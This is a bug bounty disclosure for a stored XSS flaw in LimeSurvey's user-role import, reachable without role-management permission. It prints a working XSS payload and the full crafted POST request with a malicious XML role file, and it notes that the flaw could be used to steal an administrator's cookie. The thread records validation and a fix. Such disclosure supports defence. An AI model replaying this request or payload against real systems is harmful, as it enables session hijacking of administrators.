Incorrect Authorization to Stored XSS in Import User Role function in limesurvey/limesurvey

Valid

Reported on

Jun 28th 2023

Description

The application incorrectly checks user permissions, enabling the attacker to use the 'import file user roles' functionality, which contains a payload for executing JavaScript code, without requiring any specific privileges.

Proof of Concept

Step1: Even without the privilege to manage roles, the attacker sends a POST request to /index.php?r=userRole/importXML and is still able to successfully import roles. And within the import file, it contains a payload inserted within the <name> tag.

Payload:

testxss&#39;&quot;&gt;&lt;img src/onerror=alert(document.domain)&gt;

Request:

POST /index.php?r=userRole/importXML HTTP/2
Host: demo.limesurvey.org
Cookie: PHPSESSID=1i9laa7dd5it7dek1ck7dspjh9; YII_CSRF_TOKEN=hacker
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33017625507619580921250154105
Content-Length: 2524
Origin: https://demo.limesurvey.org
Dnt: 1
Referer: https://demo.limesurvey.org/index.php?r=userRole/index
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------33017625507619580921250154105
Content-Disposition: form-data; name="YII_CSRF_TOKEN"

hacker
-----------------------------33017625507619580921250154105
Content-Disposition: form-data; name="the_file"; filename="test.xml"
Content-Type: text/xml

<?xml version="1.0"?>
<limepermissionrole><meta><name>&lt;![CDATA[testxss&#39;&quot;&gt;&lt;img src/onerror=alert(document.domain)&gt;]]&gt;</name><description>&lt;![CDATA[test]]&gt;</description><date>2023-06-28 18:45:37</date><createdOn>LimeSurvey</createdOn><createdBy>1</createdBy></meta><permissions><participantpanel><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></participantpanel><labelsets><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></labelsets><settings><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></settings><surveysgroups><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></surveysgroups><surveys><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></surveys><templates><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></templates><usergroups><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></usergroups><users><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></users><superadmin><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></superadmin><auth_db><create>0</create><read>0</read><update>0</update><delete>0</delete><import>0</import><export>0</export><title>0</title><description>0</description><img>0</img></auth_db></permissions></limepermissionrole>

-----------------------------33017625507619580921250154105--

Untitled

Step2: The administrator navigates to the role management function, and the JavaScript payload is triggered.

Untitled

Impact

The attacker can import a user role containing a payload to execute JavaScript code and hijack the cookie of the administrator...

We are processing your report and will contact the limesurvey team within 24 hours. 5 months ago

We have contacted a member of the limesurvey team and are waiting to hear back 5 months ago

tiborpacalat

commented 4 months ago

Maintainer

Internal tracking code: 18967

tiborpacalat validated this vulnerability 4 months ago

aqngoc has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

tiborpacalat marked this as fixed in 6.2.0+230732 with commit e4ce83 4 months ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

tiborpacalat published this vulnerability 4 months ago

to join this conversation